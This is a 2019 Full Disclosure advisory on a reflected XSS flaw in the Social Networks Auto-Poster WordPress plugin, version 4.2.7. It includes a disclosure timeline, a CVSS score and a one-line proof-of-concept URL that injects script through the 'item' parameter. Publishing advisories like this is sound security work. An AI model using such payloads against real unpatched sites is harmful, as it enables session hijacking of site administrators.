
Date: Tue, 5 Feb 2019 16:28:42 +0100
From: Tim Coen <tc.coen@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] NextScripts: Social Networks Auto-Poster 4.2.7 - Reflected XSS
 (WordPress Plugin)

  * Vulnerability: XSS
  * Affected Software: [NextScripts: Social Networks
Auto-Poster](https://wordpress.org/plugins/social-networks-auto-poster-facebook-twitter-g/)
  * Affected Version: 4.2.7
  * Patched Version: 4.2.8
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: 11/02/2018
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

##### CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

##### Overview

The Social Networks Auto-Poster WordPress plugin is vulnerable to
reflected XSS as it echoes the `item` parameter without proper encoding.

##### Proof of Concept


http://192.168.0.103/wordpress/wp-admin/admin.php?page=nxssnap-reposter&action=edit&item=24'"><img+src%3Dx+onerror%3Dalert(1)>

##### Timeline

- 10/25/2018 Requested email address via contact form
- 10/29/2018 Vendor supplies email address
- 10/31/2018 Advisory sent
- 11/02/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

##### Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-social-networks-auto-poster-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
